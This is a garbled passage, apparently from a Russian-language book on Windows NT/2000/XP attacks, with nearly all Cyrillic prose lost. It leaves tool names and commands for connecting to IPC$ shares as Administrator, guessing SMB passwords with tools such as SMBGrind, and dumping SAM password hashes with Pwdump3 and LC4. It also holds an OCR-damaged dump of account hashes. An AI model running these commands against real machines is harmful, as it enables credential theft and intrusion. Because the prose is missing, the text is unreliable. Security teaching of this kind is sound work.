, . nbtstat MIB, - , (. [3] [4]). , , . , . D:\>net use \\1.0.0.1\1$ * /u:Administrator * , IPC$ Administrator. : Type password for \\1.0.0.1\IPC$: . , - 165
, , , . , , , SMBGrind, CyberCop Scanner Network Associates. ( [3]). - . , , , . Windows NT/2000/XP , SAM (Security Account Manager - ). SAM (, , ) , , , . , - , , , , . , SAM, LC4 ( LOphtcrack, - LC4) (http://www.atstake.com/research/redirect.html), . Samdump - SAM. Pwdump - , . Syskey SAM ( Syskey . 2). Pwdump2 - , Syskey. . Pwdump3 - , Pwdump2, . Syskey, 2; , SAM, Windows 2000/XP , Windows NT . 2 , , , . Sword-2000 PwdimpS, : C:\>pwdump3 sword-2000 > password.psw
166
Windows 2000/XP Sword-2000, password.psw. (Notepad) (. 10.5).sword.psw - Notepad File Edit Format Help \dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO A::: Guest:501 :NO PASSWORD*"' :NO PASSWORD * ::: krbtgt:S02:NO PASSWORD ' :7BD70B6AF1C3909E006426SFE207B256::: Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;:: Alex-1:1113:7A01665EB2EB